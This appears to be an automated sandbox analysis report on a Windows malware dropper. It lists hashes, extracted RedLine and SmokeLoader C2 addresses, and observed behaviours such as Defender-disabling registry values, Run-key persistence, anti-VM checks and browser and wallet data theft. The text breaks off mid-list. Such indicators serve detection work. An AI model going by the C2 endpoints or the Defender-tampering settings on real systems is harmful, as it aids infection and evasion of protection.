Overview
overview
10Static
static
071F6BD61A...51.exe
windows7_x64
10071F6BD61A...51.exe
windows7_x64
10071F6BD61A...51.exe
windows7_x64
10071F6BD61A...51.exe
windows11_x64
10071F6BD61A...51.exe
windows10_x64
10071F6BD61A...51.exe
windows10_x64
10071F6BD61A...51.exe
windows10_x64
10071F6BD61A...51.exe
windows10_x64
10Analysis
-
max time kernel
1556s -
max time network
1809s -
platform
windows11_x64 -
resource
win11 -
submitted
28-09-2021 20:51
Static task
static1
Behavioral task
behavioral1
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win11
Behavioral task
behavioral5
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-de-20210920
General
-
Target
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
-
Size
3.9MB
-
MD5
1be0d2741eaac6804e24a7586b1086b0
-
SHA1
cdb330156b2063c6f259cb10a787463756798f7a
-
SHA256
071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9
-
SHA512
cc9352b0ace0a51cac07069adf33d98e548e6726e71bf4582dcb15c3d7b0a7806765ffc57f95511f1aeca798d7fbf44c08bc5ebe7bc13626b8b7bcd0df872f85
Malware Config
Extracted
redline
7.5k_Z_BOGOM
195.133.18.154:30491
Extracted
smokeloader
2020
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4668 6452 rundll32.exe 234 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5724 6452 rundll32.exe 234 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral4/files/0x000300000002b1d2-265.dat family_redline behavioral4/memory/6052-377-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/3952-476-0x0000000005080000-0x0000000005698000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral4/files/0x000100000002b1e3-280.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 28 IoCs
description pid Process procid_target PID 4660 created 3872 4660 WerFault.exe 91 PID 5224 created 4544 5224 WerFault.exe 96 PID 5296 created 1288 5296 WerFault.exe 92 PID 4024 created 6040 4024 WerFault.exe 122 PID 5460 created 6104 5460 WerFault.exe 131 PID 3848 created 6088 3848 WerFault.exe 133 PID 5780 created 4212 5780 WerFault.exe 125 PID 1756 created 6028 1756 WerFault.exe 276 PID 6016 created 5244 6016 WerFault.exe 413 PID 6416 created 864 6416 WerFault.exe 137 PID 6796 created 3012 6796 taskkill.exe 147 PID 6664 created 1252 6664 WerFault.exe 274 PID 7092 created 856 7092 WerFault.exe 278 PID 3008 created 3240 3008 WerFault.exe 354 PID 3268 created 1084 3268 WerFault.exe 284 PID 3316 created 4968 3316 WerFault.exe 287 PID 5748 created 3132 5748 WerFault.exe 294 PID 452 created 5884 452 WerFault.exe 334 PID 3240 created 4452 3240 WerFault.exe 277 PID 1232 created 2216 1232 WerFault.exe 353 PID 6056 created 16204 6056 WerFault.exe 383 PID 1088 created 6128 1088 WerFault.exe 392 PID 3724 created 4032 3724 WerFault.exe 405 PID 14488 created 13728 14488 WerFault.exe 486 PID 15256 created 15136 15256 WerFault.exe 525 PID 16368 created 1288 16368 WerFault.exe 539 PID 3668 created 5152 3668 WerFault.exe 542 PID 2100 created 7816 2100 WerFault.exe 559 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 6000 created 4432 6000 svchost.exe 189 PID 6000 created 4432 6000 svchost.exe 189 PID 6000 created 13836 6000 svchost.exe 487 PID 6000 created 13836 6000 svchost.exe 487 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral4/memory/3200-473-0x0000000000400000-0x000000000047C000-memory.dmp family_arkei -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
resource yara_rule behavioral4/memory/1288-220-0x0000000002710000-0x00000000027AD000-memory.dmp family_vidar behavioral4/memory/6040-417-0x00000000031B0000-0x0000000003284000-memory.dmp family_vidar behavioral4/memory/6104-439-0x0000000000E90000-0x0000000000F64000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x000200000002b1aa-151.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ac-150.dat aspack_v212_v242 behavioral4/files/0x000200000002b1ac-155.dat aspack_v212_v242 behavioral4/files/0x000200000002b1aa-152.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b2-156.dat aspack_v212_v242 behavioral4/files/0x000100000002b1b2-159.dat aspack_v212_v242 -
Blocklisted process makes network request 50 IoCs
flow pid Process 84 5244 msiexec.exe 91 5244 msiexec.exe 105 5244 msiexec.exe 108 5244 msiexec.exe 114 5244 msiexec.exe 119 5244 msiexec.exe 122 5244 msiexec.exe 150 4892 powershell.exe 159 6176 cmd.exe 171 6176 cmd.exe 325 5772 MsiExec.exe 327 5772 MsiExec.exe 328 5772 MsiExec.exe 329 5772 MsiExec.exe 330 5772 MsiExec.exe 332 5772 MsiExec.exe 333 5772 MsiExec.exe 334 5772 MsiExec.exe 336 5772 MsiExec.exe 337 5772 MsiExec.exe 338 5772 MsiExec.exe 339 5772 MsiExec.exe 340 5772 MsiExec.exe 341 5772 MsiExec.exe 342 5772 MsiExec.exe 343 5772 MsiExec.exe 344 5772 MsiExec.exe 345 5772 MsiExec.exe 349 5772 MsiExec.exe 350 5772 MsiExec.exe 351 5772 MsiExec.exe 352 5772 MsiExec.exe 353 5772 MsiExec.exe 354 5772 MsiExec.exe 355 5772 MsiExec.exe 356 5772 MsiExec.exe 357 5772 MsiExec.exe 358 5772 MsiExec.exe 361 5772 MsiExec.exe 363 5772 MsiExec.exe 364 5772 MsiExec.exe 365 5772 MsiExec.exe 366 5772 MsiExec.exe 367 5772 MsiExec.exe 368 5772 MsiExec.exe 369 5772 MsiExec.exe 370 5772 MsiExec.exe 371 5772 MsiExec.exe 372 5772 MsiExec.exe 373 5772 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Sharefolder.exe -
Executes dropped EXE 64 IoCs
pid Process 4344 setup_install.exe 3256 Thu02483b39590da5492.exe 784 Thu0247e977c7950492a.exe 4544 Thu0299d0d70a4d322.exe 1288 Thu02966ca5c58f270.exe 1260 Thu02d385ff55.exe 3872 Thu02588bdad8e7.exe 4644 Thu02f60acc90a3.exe 2548 Thu02c015332704.exe 4652 Thu02bfe1521bcc038.exe 4812 Thu0247e977c7950492a.exe 5400 Riconobbe.exe.com 5476 Riconobbe.exe.com 6028 WerFault.exe 6040 ROALiWFsQQ6znKzS1XQ1Yxhu.exe 6080 hDp_Q0M7VwC0FF7WWvUBtdbN.exe 6120 4UFxWlf4SXw8gZe000f3mxr3.exe 6088 YCX7g7FDRa0n1vrcJtVZ_H9d.exe 6112 W455uTSoUtq8LXiwXO1kYBjY.exe 6104 8Ax8th0v3UP0xwWMPp2QiY_N.exe 6128 gcleaner.exe 4708 CiDdAOtOAfGTjMtFrybZvGVz.exe 6096 vsvchNX79eSDzY6jf6F89_MI.exe 4212 _Uqo5UP9ZDxv2KDF87j1qJ5Q.exe 5156 8Fb4EkT85lFegSzJ2GCDrw_Z.exe 6136 vefp3cTczsHP35rf3STZwLUJ.exe 5092 H6KBNe4YRhkCjXl_yzSBZb2I.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 3560 HDnlha8KQxoi8bwvnS6xlPp4.exe 5244 msiexec.exe 3012 zb9d5srca1S85UfvPFnTAZJd.exe 4412 d6VXIVqi2MqlNOaKIT8CawaY.exe 5544 PGyDws9ux3Lc9PjIedgVt2AC.exe 4028 aclfGgw26YHyfrb3n9JONFow.exe 5048 jDVhr13u5N750xam3eOI1eNW.exe 4292 aOiJ03mSE4lRy3Tw5uB0q43R.exe 5564 byxb49tCEP1SdejWYr15WvcH.exe 3200 rPRLfhZmwXu3oXGQaqju2XrO.exe 1868 oKmnOrVPGDoDvSbzfd3Aw8I1.exe 5680 Install.exe 5396 210921.exe 5796 Conhost.exe 6024 269new.exe 6052 W455uTSoUtq8LXiwXO1kYBjY.exe 4688 hDp_Q0M7VwC0FF7WWvUBtdbN.exe 3912 Install.exe 5112 2841347.scr 1248 5964929.scr 4432 AdvancedRun.exe 3952 hDp_Q0M7VwC0FF7WWvUBtdbN.exe 3060 7725650.scr 1436 extd.exe 2424 5030357.scr 5140 1.exe 5852 msedge.exe 5828 3783178.scr 5112 2841347.scr 1248 5964929.scr 3504 WinHoster.exe 6176 cmd.exe 6772 qT3dWYBP7ZsuOrwW4ZcUbjl6.exe 2824 Conhost.exe 4276 Lukykutufu.exe 4588 E804.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CiDdAOtOAfGTjMtFrybZvGVz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vefp3cTczsHP35rf3STZwLUJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gcleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H6KBNe4YRhkCjXl_yzSBZb2I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion byxb49tCEP1SdejWYr15WvcH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 269new.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2841347.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vefp3cTczsHP35rf3STZwLUJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2F8F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vsvchNX79eSDzY6jf6F89_MI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3783178.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9295.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vsvchNX79eSDzY6jf6F89_MI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gcleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 269new.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2F8F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H6KBNe4YRhkCjXl_yzSBZb2I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2841347.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CiDdAOtOAfGTjMtFrybZvGVz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4UFxWlf4SXw8gZe000f3mxr3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4UFxWlf4SXw8gZe000f3mxr3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion byxb49tCEP1SdejWYr15WvcH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3783178.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9295.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netoptimize.lnk disksyncer.exe -
Loads dropped DLL 64 IoCs
pid Process 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 4344 setup_install.exe 4028 aclfGgw26YHyfrb3n9JONFow.exe 3200 rPRLfhZmwXu3oXGQaqju2XrO.exe 6880 47DB.exe 5976 4azU_c07QucZGrH2hrEOw9YR.tmp 2128 rundll32.exe 5884 rundll32.exe 4152 rundll32.exe 16248 installer.exe 16248 installer.exe 2868 autosubplayer.exe 16248 installer.exe 2172 MsiExec.exe 2172 MsiExec.exe 2868 autosubplayer.exe 4032 rundll32.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 5772 MsiExec.exe 16248 installer.exe 5772 MsiExec.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 5772 MsiExec.exe 2868 autosubplayer.exe 4144 MsiExec.exe 4144 MsiExec.exe 5772 MsiExec.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 10868 rundll32.exe 10884 rundll32.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 2868 autosubplayer.exe 12172 lighteningplayer-cache-gen.exe 12172 lighteningplayer-cache-gen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000100000002b1e4-266.dat themida behavioral4/files/0x000200000002b1ce-255.dat themida behavioral4/files/0x000200000002b1d9-262.dat themida behavioral4/files/0x000300000002b1ca-261.dat themida behavioral4/files/0x000100000002b1e6-260.dat themida behavioral4/files/0x000200000002b1cf-268.dat themida behavioral4/memory/6096-321-0x0000000000D70000-0x0000000000D71000-memory.dmp themida behavioral4/memory/6136-337-0x00000000008D0000-0x00000000008D1000-memory.dmp themida behavioral4/memory/6128-335-0x00000000007E0000-0x00000000007E1000-memory.dmp themida behavioral4/memory/6120-331-0x0000000000420000-0x0000000000421000-memory.dmp themida behavioral4/memory/5092-342-0x0000000000EE0000-0x0000000000EE1000-memory.dmp themida -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths A5SgmahwE9hpMlGs6aKgdDtn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions A5SgmahwE9hpMlGs6aKgdDtn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" A5SgmahwE9hpMlGs6aKgdDtn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\A5SgmahwE9hpMlGs6aKgdDtn.exe = "0" A5SgmahwE9hpMlGs6aKgdDtn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection A5SgmahwE9hpMlGs6aKgdDtn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet A5SgmahwE9hpMlGs6aKgdDtn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features A5SgmahwE9hpMlGs6aKgdDtn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1CCA.exe = "0" 1CCA.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run disksyncer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\main_signed1.exe = "C:\\ProgramData\\main_signed1.\\main_signed1.exe" disksyncer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\DebasedSeptenary_2021-09-28_19-42.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\DebasedSeptenary_2021-09-28_19-42.\\DebasedSeptenary_2021-09-28_19-42.exe" disksyncer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Thu02bfe1521bcc038.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Thu02bfe1521bcc038.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5030357.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Hawemipemo.exe\"" Sharefolder.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2F8F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gcleaner.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vsvchNX79eSDzY6jf6F89_MI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4UFxWlf4SXw8gZe000f3mxr3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vefp3cTczsHP35rf3STZwLUJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3783178.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2841347.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA H6KBNe4YRhkCjXl_yzSBZb2I.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA byxb49tCEP1SdejWYr15WvcH.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 210921.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 269new.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CiDdAOtOAfGTjMtFrybZvGVz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9295.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: 3C3A.exe File opened (read-only) \??\Y: 3C3A.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\S: 3C3A.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: 3C3A.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: 3C3A.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: 3C3A.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: 3C3A.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: 3C3A.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: 3C3A.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\P: 3C3A.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\G: 3C3A.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipinfo.io 11 ip-api.com 27 ipinfo.io 89 ipinfo.io 155 ipinfo.io -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 49 IoCs
pid Process 6096 vsvchNX79eSDzY6jf6F89_MI.exe 6120 4UFxWlf4SXw8gZe000f3mxr3.exe 6136 vefp3cTczsHP35rf3STZwLUJ.exe 5048 jDVhr13u5N750xam3eOI1eNW.exe 6128 gcleaner.exe 5092 H6KBNe4YRhkCjXl_yzSBZb2I.exe 5564 byxb49tCEP1SdejWYr15WvcH.exe 5048 jDVhr13u5N750xam3eOI1eNW.exe 5396 210921.exe 6024 269new.exe 5048 jDVhr13u5N750xam3eOI1eNW.exe 5828 3783178.scr 5112 2841347.scr 5048 jDVhr13u5N750xam3eOI1eNW.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 4708 CiDdAOtOAfGTjMtFrybZvGVz.exe 5048 jDVhr13u5N750xam3eOI1eNW.exe 5048 jDVhr13u5N750xam3eOI1eNW.exe 6036 2F8F.exe 5668 9295.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe 13728 1CCA.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 6112 set thread context of 6052 6112 W455uTSoUtq8LXiwXO1kYBjY.exe 167 PID 4292 set thread context of 5112 4292 aOiJ03mSE4lRy3Tw5uB0q43R.exe 205 PID 6080 set thread context of 3952 6080 hDp_Q0M7VwC0FF7WWvUBtdbN.exe 182 PID 864 set thread context of 6176 864 A5SgmahwE9hpMlGs6aKgdDtn.exe 318 PID 2824 set thread context of 4588 2824 Conhost.exe 254 PID 4276 set thread context of 2392 4276 Lukykutufu.exe 259 PID 6880 set thread context of 1180 6880 47DB.exe 272 PID 6096 set thread context of 6920 6096 vsvchNX79eSDzY6jf6F89_MI.exe 297 PID 1604 set thread context of 6888 1604 tmp7B8A_tmp.exe 317 PID 13728 set thread context of 14344 13728 1CCA.exe 514 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File created C:\Program Files\MSBuild\PJQXQGAGPE\foldershare.exe.config Sharefolder.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\OsCELDuBOVuk\cache.dat powershell.exe File opened for modification C:\Program Files 